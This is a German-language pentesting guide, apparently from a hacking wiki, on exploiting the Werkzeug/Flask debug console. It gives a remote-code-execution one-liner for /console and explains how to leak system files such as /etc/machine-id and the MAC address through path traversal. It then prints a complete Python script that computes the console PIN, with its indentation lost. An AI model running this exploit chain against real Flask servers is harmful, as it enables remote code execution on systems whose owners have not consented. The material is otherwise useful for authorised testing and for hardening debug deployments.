Werkzeug / Flask Debug

Erhalte die Perspektive eines Hackers auf deine Webanwendungen, Netzwerke und Cloud

Finde und melde kritische, ausnutzbare Schwachstellen mit echtem Geschäftsauswirkungen. Nutze unsere 20+ benutzerdefinierten Tools, um die Angriffsfläche zu kartieren, Sicherheitsprobleme zu finden, die dir ermöglichen, Privilegien zu eskalieren, und automatisierte Exploits zu verwenden, um wesentliche Beweise zu sammeln, die deine harte Arbeit in überzeugende Berichte verwandeln.

Penetration testing toolkit, ready to usePentest-Tools.com

Console RCE

Wenn das Debugging aktiv ist, könntest du versuchen, auf /console zuzugreifen und RCE zu erlangen.

__import__('os').popen('whoami').read();

Es gibt auch mehrere Exploits im Internet wie diesen oder einen in Metasploit.

Pin Geschützt - Path Traversal

In einigen Fällen wird der /console Endpunkt durch einen Pin geschützt. Wenn Sie eine Dateitraversal-Schwachstelle haben, können Sie alle notwendigen Informationen leaken, um diesen Pin zu generieren.

Werkzeug Console PIN Exploit

Erzwingen Sie eine Debug-Fehlerseite in der App, um dies zu sehen:

The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server

Eine Nachricht bezüglich des Szenarios "Konsole gesperrt" wird angezeigt, wenn versucht wird, auf die Debug-Schnittstelle von Werkzeug zuzugreifen, was auf die Notwendigkeit eines PINs hinweist, um die Konsole zu entsperren. Es wird vorgeschlagen, den Konsolen-PIN auszunutzen, indem der PIN-Generierungsalgorithmus in der Debug-Initialisierungsdatei von Werkzeug (__init__.py) analysiert wird. Der Mechanismus zur PIN-Generierung kann im Werkzeug-Quellcode-Repository studiert werden, es wird jedoch geraten, den tatsächlichen Servercode über eine Dateitraversal-Sicherheitsanfälligkeit zu beschaffen, um mögliche Versionsunterschiede zu vermeiden.

Um den Konsolen-PIN auszunutzen, werden zwei Variablen-Sets benötigt: probably_public_bits und private_bits:

probably_public_bits

• username: Bezieht sich auf den Benutzer, der die Flask-Sitzung initiiert hat.

• modname: Typischerweise als flask.app bezeichnet.

• getattr(app, '__name__', getattr(app.__class__, '__name__')): Resolviert in der Regel zu Flask.

• getattr(mod, '__file__', None): Stellt den vollständigen Pfad zu app.py im Flask-Verzeichnis dar (z. B. /usr/local/lib/python3.5/dist-packages/flask/app.py). Wenn app.py nicht zutrifft, versuchen Sie app.pyc.

private_bits

• uuid.getnode(): Ruft die MAC-Adresse des aktuellen Geräts ab, wobei str(uuid.getnode()) sie in ein dezimales Format übersetzt.

• Um die MAC-Adresse des Servers zu bestimmen, muss die aktive Netzwerkschnittstelle identifiziert werden, die von der App verwendet wird (z. B. ens3). Bei Unsicherheiten leaken Sie /proc/net/arp, um die Geräte-ID zu finden, und extrahieren Sie dann die MAC-Adresse aus /sys/class/net/<device id>/address.

• Die Umwandlung einer hexadezimalen MAC-Adresse in dezimal kann wie folgt durchgeführt werden:

# Beispiel MAC-Adresse: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692

• get_machine_id(): Verknüpft Daten aus /etc/machine-id oder /proc/sys/kernel/random/boot_id mit der ersten Zeile von /proc/self/cgroup nach dem letzten Schrägstrich (/).

</details>

Nachdem alle notwendigen Daten gesammelt wurden, kann das Exploit-Skript ausgeführt werden, um die Werkzeug-Konsole-PIN zu generieren:

Nachdem alle notwendigen Daten gesammelt wurden, kann das Exploit-Skript ausgeführt werden, um die Werkzeug-Konsole-PIN zu generieren. Das Skript verwendet die zusammengestellten `probably_public_bits` und `private_bits`, um einen Hash zu erstellen, der dann weiterverarbeitet wird, um die endgültige PIN zu erzeugen. Unten steht der Python-Code zur Ausführung dieses Prozesses:
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',  # username
'flask.app',  # modname
'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
'279275995014060',  # str(uuid.getnode()),  /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)